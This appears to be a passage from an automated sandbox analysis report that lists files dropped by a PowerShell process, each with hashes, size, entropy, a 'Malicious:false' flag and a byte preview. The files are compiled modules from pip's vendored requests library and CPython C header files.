                              SSDEEP:384:7morp/6ufA//8AweLEWjHqc58xaFpuSjWWj0gKh0ntAOJKmJevvGKf2xIxqrs:rR6ZEq6/SyCVrEm4vvv2xIgrs
                              MD5:2C8A5EC2BD07ECFD6F1891A2A916C5FF
                              SHA1:1F7C95EAD185EB77590673F6831A8C27952DB5FA
                              SHA-256:0059D4F3F3B6752594CC90DF60634BD16E8366689FCEAEAE3A14346F67D9B966
                              SHA-512:3B95E8C4FB8C280A54A5783AFDC1FACE0FAD29540AD1AE6EA7B9CDBC94DE1602A483BB0BD88B68F44AB6D33DB0D108C95E8BA9AB3A9F1DF0F3F4173960B34501
                              Malicious:false
                              Preview:........=.Cf.L.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&m'Z'm.Z.m(Z(m)Z)m*Z*m.Z.m+Z+m,Z,m.Z...d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8....d.d.l9m:Z:..d.Z<d.Z=d.Z>d.Z?..G.d...d.........Z@..G.d...d.e@........ZAy.#.e;$.r...d...Z:Y..(w.x.Y.w.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_url)...Retry.....)..._basic_auth_str)...basestring..urlparse)...extract_cookies_to_jar)...ConnectionError..ConnectTimeoutr......
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7215
                              Entropy (8bit):5.317449832344298
                              Encrypted:false
                              SSDEEP:96:KfTMVXGLluXWC7ZolNAzj8t8EkvI2gt9GmCleGmwGm4diSA:KrMVXEoZjM8ncule8JSA
                              MD5:7F1B81422719CE573BF4B8BD29B51B60
                              SHA1:511DCC62B03F90D4551EC1A1916C64D362CB9126
                              SHA-256:C55535B717F123297D95FE0F809792AE3915D726472DF9AA2C2B0C132026E81B
                              SHA-512:D8EA8A724B94964C6FD4EC3B6614FAAA4E36F1F1EF1399A768AB6DC348D768C5A672187AA74757A17D946EAF7C56EA28B8DABFDF86832D22B41EFEC6B964787D
                              Malicious:false
                              Preview:........=.Cf1.........................L.....d.Z.d.d.l.m.Z...d...Z.d.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.y.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc..........................t.........j...........................5.}...|.j...................d.|.|.d...|.....c.d.d.d...........S.#.1.s.w...Y.....y.x.Y.w.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13934
                              Entropy (8bit):5.0923787575287855
                              Encrypted:false
                              SSDEEP:192:sRSX0eafJ8hH9jwdJssOeFIg+1xIcjn+d1mVqhX:s40eY8PwdJ2lL+frX
                              MD5:D330A27E24A122C4FFEE2CC64F075188
                              SHA1:47FF8E1A89E9B661D47036768D0CADB4B4D38FAA
                              SHA-256:3E0D03BB54627D6AB9B2C3AE6AA53A563BD556B8556AEABC916B0DC187A12B5D
                              SHA-512:25CB974CA62654048336413AD9BBF3CE6B8343A3F460B643384930ED872A2B9E2F2A7AAFF3A8D307EC6E67240FABD0372C32F24DFB4C618742AB07C1DE01473B
                              Malicious:false
                              Preview:........=.Cf.'..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d...Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac...........................t.........|.t.................s5t.........j...................d.j...................|.........t.....................t.........|.........}.t.........|.t.................s>t.........j...................d.j...................t.........|.................t.....................t.........|.........}.t.........|.t.................r.|.j...................d.........}.t.........|.t.................r.|.j...................d.........}.d.t....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):933
                              Entropy (8bit):5.408954044810001
                              Encrypted:false
                              SSDEEP:12:rFSBR/EF1A3Dj4uIy1XfB4A4kvYa4ZkiaWPdImaiUS+O++PhctIxKfxDg/:ZcEFgbXKAhwa9FG3/UWh0IxAg
                              MD5:65C8446E7336858326EDE9228CC08532
                              SHA1:2E65862E760C00C2ED74722595393EF64D0247AC
                              SHA-256:FCEFF0E5DECAB51F28CD29B642A518B7F3B35E271E4714115189A8F4523D6634
                              SHA-512:71497DE6913925120C9C4330047EB94B9C3CE8723AEE1682662834B14792F1049BC369ED35D4EA1B99A3C25E12BFB81F0A4FD9826FD53BB9D1B5246F4786C4C0
                              Malicious:false
                              Preview:........=.Cf?.........................f.....d.Z.d.d.l.Z.d.e.j...................v.r.d.d.l.m.Z...n.d...Z.e.d.k(..r...e...e...................y.y.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......N.._PIP_STANDALONE_CERT)...wherec.....................(.....t.........j...................d.....S.).Nr....)...os..environ........fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/requests/certs.pyr....r........s..........z.z..0..1..1r......__main__)...__doc__r....r......pip._vendor.certifir......__name__..printr....r....r......<module>r........s;.............................+..)....2......z.......%.'.N.....r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):33515
                              Entropy (8bit):5.049225836907265
                              Encrypted:false
                              SSDEEP:384:ARfw2fvQG1vQ+tHc76EETHXe3/IUOLZt5FooP2LG+nx4E3WNVUr9zzXmMRn:4fwBg9t5bRE4E36VSPXmyn
                              MD5:E450B9493F54CA366A4CC705A521F6A8
                              SHA1:913079D9E413D335B97375475FD4E121262D4F9D
                              SHA-256:45FA29126FA9B3C887505D1165A8F2A0A3E1B94189574F6279D49E4EDC940A57
                              SHA-512:32C351794B775D9BF18ED5D413729628660FA082FEDBFAB94B364DEC50C697D8815D88A9B24D968F4F41EAEE581511B79F386BC51A4EE66877C39D61BFD032E0
                              Malicious:false
                              Preview:/* Abstract Object Interface (many thanks to Jim Fulton) */....#ifndef Py_ABSTRACTOBJECT_H..#define Py_ABSTRACTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* === Object Protocol ================================================== */..../* Implemented elsewhere:.... int PyObject_Print(PyObject *o, FILE *fp, int flags);.... Print an object 'o' on file 'fp'. Returns -1 on error. The flags argument.. is used to enable certain printing options. The only option currently.. supported is Py_PRINT_RAW. By default (flags=0), PyObject_Print() formats.. the object by calling PyObject_Repr(). If flags equals to Py_PRINT_RAW, it.. formats the object by calling PyObject_Str(). */....../* Implemented elsewhere:.... int PyObject_HasAttrString(PyObject *o, const char *attr_name);.... Returns 1 if object 'o' has the attribute attr_name, and 0 otherwise..... This is equivalent to the Python expression: hasattr(o,attr_name)..... This function always succeeds. */....../* Implem
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):278
                              Entropy (8bit):5.092780173257203
                              Encrypted:false
                              SSDEEP:6:BMraEAQ0d9a7jQ6z3yXVBIAMz5jQ6dnra2zv:BNFcVNdD
                              MD5:BE92944A8F488C10556BCA4885E85A09
                              SHA1:4E8FB17BCE9D0084F330B4675A5A8FBDD1859979
                              SHA-256:9BC7D4F6546AD38715880208EBE004616CCB76413009B664BD8FE1D3EBA06F59
                              SHA-512:350DD34CA060175C11E34AC5854E118E84F520DF5F1237CCCD3BA76D5192479BEA81643D48BE5E7D76E04649F781F5D5A6ABDC76C2538602FEF8C4DD1D854C27
                              Malicious:false
                              Preview:#ifndef Py_BLTINMODULE_H..#define Py_BLTINMODULE_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyFilter_Type;..PyAPI_DATA(PyTypeObject) PyMap_Type;..PyAPI_DATA(PyTypeObject) PyZip_Type;....#ifdef __cplusplus..}..#endif..#endif /* !Py_BLTINMODULE_H */..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1178
                              Entropy (8bit):5.203769393844747
                              Encrypted:false
                              SSDEEP:12:UIBamrLuzcAA0m1+RgIaLPermmroiXCEbdUJlHt1oXCmlMga1o1f9paqI1frWCnR:Xas17z9itdUJhrm6g+JhfM4q+
                              MD5:EAD740053C2F5CC4F5749EECC38B10A7
                              SHA1:7465C882C5377662BD47D151ACB3B1A2EF2EFEEC
                              SHA-256:F64D91178208312D80D5D46BE9426FF23C951B91A5315C888AC76AAB2D700C17
                              SHA-512:5809C3AB4DD3B208B99EAC407D258B646FD632B21A6CFC2599B61147C2BB24D95F50BAC702362523CD7B8E0075C31C1497195BE6445AB83032CBA9F3E8FA8D56
                              Malicious:false
                              Preview:/* Boolean object interface */....#ifndef Py_BOOLOBJECT_H..#define Py_BOOLOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif......// PyBool_Type is declared by object.h....#define PyBool_Check(x) Py_IS_TYPE((x), &PyBool_Type)..../* Py_False and Py_True are the only two bools in existence. */..../* Don't use these directly */..PyAPI_DATA(PyLongObject) _Py_FalseStruct;..PyAPI_DATA(PyLongObject) _Py_TrueStruct;..../* Use these macros */..#define Py_False _PyObject_CAST(&_Py_FalseStruct)..#define Py_True _PyObject_CAST(&_Py_TrueStruct)....// Test if an object is the True singleton, the same as "x is True" in Python...PyAPI_FUNC(int) Py_IsTrue(PyObject *x);..#define Py_IsTrue(x) Py_Is((x), Py_True)....// Test if an object is the False singleton, the same as "x is False" in Python...PyAPI_FUNC(int) Py_IsFalse(PyObject *x);..#define Py_IsFalse(x) Py_Is((x), Py_False)..../* Macros for returning Py_True or Py_False, respectively */..#define Py_RETURN_TRUE return Py_True..#define Py_RETURN_FALSE
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1510
                              Entropy (8bit):5.215885421487236
                              Encrypted:false
                              SSDEEP:24:fNBpgWrWdNhGUdGUd4wZDnXnQMjrDQGkzuGHKljNiEZbs:FbgWyGOLnXnQ4rDQGSFKljNNA
                              MD5:AB8E1A6710F2700EDAF3B5AF1810584E
                              SHA1:D733222C870B4AB1A05189EB4B72C61C0F3C234B
                              SHA-256:CEBCD3142F4A89F5D8E16A91A353B4B0FA1EFD156C41F0F7667B08502348DBC4
                              SHA-512:7208A322D0C414FFC32B322859D1E7E0FD092262A7FD9239F532CA46F1C02AB7BDBF00A213AE8E18E01D3443F701159DFB488EFDE39083EB3F7F6D5205F05F9D
                              Malicious:false
                              Preview:/* ByteArray object interface */....#ifndef Py_BYTEARRAYOBJECT_H..#define Py_BYTEARRAYOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Type PyByteArrayObject represents a mutable array of bytes... * The Python API is that of a sequence;.. * the bytes are mapped to ints in [0, 256)... * Bytes are not characters; they may be used to encode characters... * The only way to go between bytes and str/unicode is via encoding.. * and decoding... * For the convenience of C programmers, the bytes type is considered.. * to contain a char pointer, not an unsigned char pointer... */..../* Type object */..PyAPI_DATA(PyTypeObject) PyByteArray_Type;..PyAPI_DATA(PyTypeObject) PyByteArrayIter_Type;..../* Type check macros */..#define PyByteArray_Check(self) PyObject_TypeCheck((self), &PyByteArray_Type)..#define PyByteArray_CheckExact(self) Py_IS_TYPE((self), &PyByteArray_Type)..../* Direct API functions */..PyAPI_FUNC(PyObject *) PyByteArray_FromObject(PyObject *);..PyAPI_FUNC(PyObject *) PyByteA
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2688
                              Entropy (8bit):5.03241958564926
                              Encrypted:false
                              SSDEEP:24:Kp0LK3hWrc7yOD31cHi4AYcalONk3GRdk/MWkGLvWNHYN5Ucf0ID+Gw+AIKHzTLU:KzQ2Z3C6skN3GLcYN5qq5XKLKydpo
                              MD5:A507BB1598708E79F7A0B998863BEB0A
                              SHA1:0DCAD55B80510BA7DCBA82FACF375B88BFF37E21
                              SHA-256:F940E738ABCD25E611F2E37321AE34FF15726F97AF3525E87847A56B8910B4F0
                              SHA-512:30654E006589E747FCCD14823671C04C0BE83BF4395CABEBFF3ED306C1C9262D846B631CE71D1B8B1C91756730B891FC409E1A73D20D43C85C60D1E7FDBF95D7
                              Malicious:false
                              Preview:../* Bytes object interface */....#ifndef Py_BYTESOBJECT_H..#define Py_BYTESOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#include <stdarg.h> // va_list..../*..Type PyBytesObject represents a byte string. An extra zero byte is..reserved at the end to ensure it is zero-terminated, but a size is..present so strings with null bytes in them can be represented. This..is an immutable object type.....There are functions to create new bytes objects, to test..an object for bytes-ness, and to get the..byte string value. The latter function returns a null pointer..if the object is not of the proper type...There is a variant that takes an explicit size as well as a..variant that assumes a zero-terminated string. Note that none of the..functions should be applied to NULL pointer...*/....PyAPI_DATA(PyTypeObject) PyBytes_Type;..PyAPI_DATA(PyTypeObject) PyBytesIter_Type;....#define PyBytes_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_BYTES_SUBCLAS
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6435
                              Entropy (8bit):5.16815735809761
                              Encrypted:false
                              SSDEEP:96:bE4Ve4NUnqRZDEEfXncu3ypBMxreupqH0AcczYn4xjZ9nKaT6azEjZegaiRW:bEMJ9oeXt0B2r/4TE+rpgaiRW
                              MD5:F3ABA8D81740F657C3FA2B2CBBBA89DB
                              SHA1:C8406E48FFFE4A94CCF4CBAA71F40E46F1BF32B4
                              SHA-256:74D3F6D9DDA30EBE2D4679E60D2EF39822F692F202E5062F2EF08634FD5F8155
                              SHA-512:2DE84F4657C8F52AD8D1D5868A2D47B06065D3504D5F682E17656845E29845F338BAC7EDBA6C4914ABFD80E3E4F451DD8CDB73BF33BF66F8178217818D48DC6E
                              Malicious:false
                              Preview:/* Interface to random parts in ceval.c */....#ifndef Py_CEVAL_H..#define Py_CEVAL_H..#ifdef __cplusplus..extern "C" {..#endif......PyAPI_FUNC(PyObject *) PyEval_EvalCode(PyObject *, PyObject *, PyObject *);....PyAPI_FUNC(PyObject *) PyEval_EvalCodeEx(PyObject *co,.. PyObject *globals,.. PyObject *locals,.. PyObject *const *args, int argc,.. PyObject *const *kwds, int kwdc,.. PyObject *const *defs, int defc,.. PyObject *kwdefs, PyObject *closure);..../* PyEval_CallObjectWithKeywords(), PyEval_CallObject(), PyEval_CallFunction.. * and PyEval_CallMethod are deprecated. Since they are officially part of the.. * stable ABI (PEP 384), they must be kept for backward compatibility... * PyObject_Call(), PyObject_CallFunction() and PyObject_CallMethod() are..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7319
                              Entropy (8bit):4.906117974667103
                              Encrypted:false
                              SSDEEP:192:neJjxcT8JKIXaHFD4DHD4KTXGn7b7WoPBaMxmShlAT:TpIKlD4DRTW7b7RPBaMLheT
                              MD5:36B63F92D98A926090A007E1FE6252D4
                              SHA1:73E0B3D0858EA58257EE2FC8B193DB69FA2D4A70
                              SHA-256:5EFDBAE68E530CCD2BD918C1B0DE68570397ECE9C5ACD453058E2DCAA35126DB
                              SHA-512:3D2A3FA7CBE8D6093A12BF2C38BA5C83EAC33879AE8BFC186EF8603D9433CA1F04D465D306D894E9EA01B8777FB300208103B306757BD45EC0E41C5CFB743053
                              Malicious:false
                              Preview:#ifndef Py_CODECREGISTRY_H..#define Py_CODECREGISTRY_H..#ifdef __cplusplus..extern "C" {..#endif..../* ------------------------------------------------------------------------.... Python Codec Registry and support functions......Written by Marc-Andre Lemburg (mal@lemburg.com).....Copyright (c) Corporation for National Research Initiatives..... ------------------------------------------------------------------------ */..../* Register a new codec search function..... As side effect, this tries to load the encodings package, if not.. yet done, to make sure that it is always first in the list of.. search functions..... The search_function's refcount is incremented by this function. */....PyAPI_FUNC(int) PyCodec_Register(.. PyObject *search_function.. );..../* Unregister a codec search function and clear the registry's cache... If the search function is not registered, do nothing... Return 0 on success. Raise an exception and return -1 on error. */....PyAPI_FUNC(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):470
                              Entropy (8bit):5.012445431773599
                              Encrypted:false
                              SSDEEP:12:Bl1Im21IkvEyLMvE36WkQZhLtrCJ7TplcQ/BgpjOInD:Tem2ewTLMvGXIpp/mpj1nD
                              MD5:FD0518C3781EFC55ECC8A8706BCEDA17
                              SHA1:84443863E3CAE1C52CCBB754ABCDF7543B08477C
                              SHA-256:233E46ABC04B0CEF0169F0108695287DCDE0C31468E734D4AFA8D2C228CAD76A
                              SHA-512:CD8072892431DA08165D42E5E4FC283D48947BBCAE9E4E535107FDCA565AEBA91DD66C8F6045660A3487C17C72F1D15B6BF78255216A6BB5370A39C4FD67B73D
                              Malicious:false
                              Preview:#ifndef Py_COMPILE_H..#define Py_COMPILE_H..#ifdef __cplusplus..extern "C" {..#endif..../* These definitions must match corresponding definitions in graminit.h. */..#define Py_single_input 256..#define Py_file_input 257..#define Py_eval_input 258..#define Py_func_type_input 345....#ifndef Py_LIMITED_API..# define Py_CPYTHON_COMPILE_H..# include "cpython/compile.h"..# undef Py_CPYTHON_COMPILE_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_COMPILE_H */..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):758
                              Entropy (8bit):5.339781679537925
                              Encrypted:false
                              SSDEEP:12:U/HKrl1X21h3ShQNjXN89Nj3IYTunO5OPMLyOPziSrCJ7pcM3B+O+:FZ2DEQNS9NDr/QPMLvPziNPEf
                              MD5:4505CF9A1806E32E10E90F138E88194A
                              SHA1:A0125472F95F108F2B97F40CD65D6BA3ED26326B
                              SHA-256:2C3DB293A8B3921B7C9C2ADEE62B0CC0FFED5D7D1D388084605B76970D029A5B
                              SHA-512:F056B5841530D52F8329D895F05EDBD624B9D21C4971FF22771CC997EDAC4F139225350FBB4C3CFF1C3FD33835AF8E6DF2BB4F1CCCFE2D881DB63EE4A7968FD4
                              Malicious:false
                              Preview:/* Complex number structure */....#ifndef Py_COMPLEXOBJECT_H..#define Py_COMPLEXOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Complex object interface */....PyAPI_DATA(PyTypeObject) PyComplex_Type;....#define PyComplex_Check(op) PyObject_TypeCheck((op), &PyComplex_Type)..#define PyComplex_CheckExact(op) Py_IS_TYPE((op), &PyComplex_Type)....PyAPI_FUNC(PyObject *) PyComplex_FromDoubles(double real, double imag);....PyAPI_FUNC(double) PyComplex_RealAsDouble(PyObject *op);..PyAPI_FUNC(double) PyComplex_ImagAsDouble(PyObject *op);....#ifndef Py_LIMITED_API..# define Py_CPYTHON_COMPLEXOBJECT_H..# include "cpython/complexobject.h"..# undef Py_CPYTHON_COMPLEXOBJECT_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_COMPLEXOBJECT_H */..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8076
                              Entropy (8bit):5.0967663605391715
                              Encrypted:false
                              SSDEEP:192:siFi79pbVj+xOFdLQ1PZKR1RZVxA/t+Eb:pY7D4YQ1hwbZfCt+Eb
                              MD5:884D92AF8ED9A6DCF989FB38D5D49C9D
                              SHA1:AF33F3E73502046ACF5091B99C8AB0C16A327FC7
                              SHA-256:FC038177A6EB3AB4B4131DAD020E3B805E95FB337D25C1DA37D7B4B5D921FC19
                              SHA-512:E0440A9D0EB324A2689D5F5FF6FBC2D702011DF74E48D021FB7DE324011D4FE15B7BED612E4E2A6165FEE904A5882A311E7A43B211F5D279F0BFAA0AAE6D63C7
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_ABSTRACTOBJECT_H..# error "this header file must not be included directly"..#endif..../* === Object Protocol ================================================== */....#ifdef PY_SSIZE_T_CLEAN..# define _PyObject_CallMethodId _PyObject_CallMethodId_SizeT..#endif..../* Convert keyword arguments from the FASTCALL (stack: C array, kwnames: tuple).. format to a Python dictionary ("kwargs" dict)..... The type of kwnames keys is not checked. The final function getting.. arguments is responsible to check if all keys are strings, for example using.. PyArg_ParseTupleAndKeywords() or PyArg_ValidateKeywordArguments()..... Duplicate keys are merged using the last value. If duplicate keys must raise.. an exception, the caller is responsible to implement an explicit keys on.. kwnames. */..PyAPI_FUNC(PyObject *) _PyStack_AsDict(.. PyObject *const *values,.. PyObject *kwnames);..../* Suggested size (number of positional arguments) for arrays of PyObject*.. alloc
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1197
                              Entropy (8bit):5.082527943546492
                              Encrypted:false
                              SSDEEP:24:ewxibUnxR7xyBEyCt3biSRa5sfToqr5om3Rk1Kr5oJZLrN5:ecgWR7dLihufToEmm3RkSmJZL3
                              MD5:42F5173439E434D0249691ADE0A33DE7
                              SHA1:46F2FC282091254299AB9D187819C20D085DCBEF
                              SHA-256:30A61FF55514C0B0955A0954CD130FE6878C64D79C1A3034C0F54A5D3CAD2E52
                              SHA-512:C78B05583D8F4384E51F046EE256FDAB3A03A756FAABB5C48A999145A9273AD97485ACA488BA3FBE372EB68C14B4529BC103D29BA67B0BE0631BDEE44DE2557E
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_BYTEARRAYOBJECT_H..# error "this header file must not be included directly"..#endif..../* Object layout */..typedef struct {.. PyObject_VAR_HEAD.. Py_ssize_t ob_alloc; /* How many bytes allocated in ob_bytes */.. char *ob_bytes; /* Physical backing buffer */.. char *ob_start; /* Logical start inside ob_bytes */.. Py_ssize_t ob_exports; /* How many buffer exports */..} PyByteArrayObject;....PyAPI_DATA(char) _PyByteArray_empty_string[];..../* Macros and static inline functions, trading safety for speed */..#define _PyByteArray_CAST(op) \.. (assert(PyByteArray_Check(op)), _Py_CAST(PyByteArrayObject*, op))....static inline char* PyByteArray_AS_STRING(PyObject *op)..{.. PyByteArrayObject *self = _PyByteArray_CAST(op);.. if (Py_SIZE(self)) {.. return self->ob_start;.. }.. return _PyByteArray_empty_string;..}..#define PyByteArray_AS_STRING(self) PyByteArray_AS_STRING(_PyObject_CAST(self))....static inline Py_ssize_t PyBy
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4555
                              Entropy (8bit):4.959829710548539
                              Encrypted:false
                              SSDEEP:96:ecS2m2ThQLRZ7JZDpffTGf9bTPD+yWsW044sAWs84KZ4Ko44o44KLB:xDmxLR7ZDp3TgiyWsW0JzWs8pZpofo4T
                              MD5:F29B6D38047474B0A7B2269C9955C3ED
                              SHA1:22549C9E01F0EFEF67AE8BA709D86C6877C4A480
                              SHA-256:38DD20136824048FDED9C197C1A7D07FF5AADA86700D21E0599994B38BF00B8A
                              SHA-512:DE8966584A9DCB92C00677CD2C541B1907F2811D71707D7E6D06F67BA5FF84031A6BE619B220B663AE12BA883AA84D3DD29BD8E5163DA88F588A464FEAC153BA
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_BYTESOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. Py_DEPRECATED(3.11) Py_hash_t ob_shash;.. char ob_sval[1];.... /* Invariants:.. * ob_sval contains space for 'ob_size+1' elements... * ob_sval[ob_size] == 0... * ob_shash is the hash of the byte string or -1 if not computed yet... */..} PyBytesObject;....PyAPI_FUNC(int) _PyBytes_Resize(PyObject **, Py_ssize_t);..PyAPI_FUNC(PyObject*) _PyBytes_FormatEx(.. const char *format,.. Py_ssize_t format_len,.. PyObject *args,.. int use_bytearray);..PyAPI_FUNC(PyObject*) _PyBytes_FromHex(.. PyObject *string,.. int use_bytearray);..../* Helper for PyBytes_DecodeEscape that detects invalid escape chars. */..PyAPI_FUNC(PyObject *) _PyBytes_DecodeEscape(const char *, Py_ssize_t,.. const char *, const char **);..../* Macros and static inline functions, trading s
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1120
                              Entropy (8bit):5.1296969351387744
                              Encrypted:false
                              SSDEEP:12:U5mrCJBrhNz+X5oxme7hsV4afIIYo5ntnIoD39oA1S3gOht/Dx5V32b1gVHgOJqP:iZPnxzsJfIwp/mthh4b1EtJqMx254a/
                              MD5:69BEE18A8C48C021A7EA6C23DF3D9772
                              SHA1:BF1A0DC07C757B3FAF28A96B7AA9B1CA812173DB
                              SHA-256:41B60E8DA674956162F886D3B6A005CC16F1551171AE8329CBD8FCAEE08C1F52
                              SHA-512:2870A2C86F9F83DF1CB906C0B6D68BF68FC26EF24DCE01DA99A10FEB5745A12AB63B263C6EB6E0491A87625474D615EEA8DCDD20C9C048E21EC68B1B3D118597
                              Malicious:false
                              Preview:/* Cell object interface */....#ifndef Py_LIMITED_API..#ifndef Py_CELLOBJECT_H..#define Py_CELLOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef struct {.. PyObject_HEAD.. /* Content of the cell or NULL when empty */.. PyObject *ob_ref;..} PyCellObject;....PyAPI_DATA(PyTypeObject) PyCell_Type;....#define PyCell_Check(op) Py_IS_TYPE((op), &PyCell_Type)....PyAPI_FUNC(PyObject *) PyCell_New(PyObject *);..PyAPI_FUNC(PyObject *) PyCell_Get(PyObject *);..PyAPI_FUNC(int) PyCell_Set(PyObject *, PyObject *);....static inline PyObject* PyCell_GET(PyObject *op) {.. PyCellObject *cell;.. assert(PyCell_Check(op));.. cell = _Py_CAST(PyCellObject*, op);.. return cell->ob_ref;..}..#define PyCell_GET(op) PyCell_GET(_PyObject_CAST(op))....static inline void PyCell_SET(PyObject *op, PyObject *value) {.. PyCellObject *cell;.. assert(PyCell_Check(op));.. cell = _Py_CAST(PyCellObject*, op);.. cell->ob_ref = value;..}..#define PyCell_SET(op, value) PyCell_SET(_PyO
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1685
                              Entropy (8bit):5.26443021799548
                              Encrypted:false
                              SSDEEP:48:RfcgTqTjq4egMcfJBMiZaKTRNsdSOu1q4G:RfcIqvq4cchYaR4SVLG
                              MD5:C247B66D1DD0BDFE7AA0195519661BC5
                              SHA1:D3BF928BC2F1BCCD1E55FC5D79B3C92083F0CAEE
                              SHA-256:545146542650C0B962E523D4C83CD2D3A9F5943B5AD75EA3F22AFF15111A25ED
                              SHA-512:527FAE338C9656F9DC254339CAF31073A3A7453387938DB0FA9555B3C5F78D50E27BF65A200B01B56582ECF86BFA6DB8E7A276FA4EE996B3212F1FF920ACD300
                              Malicious:false
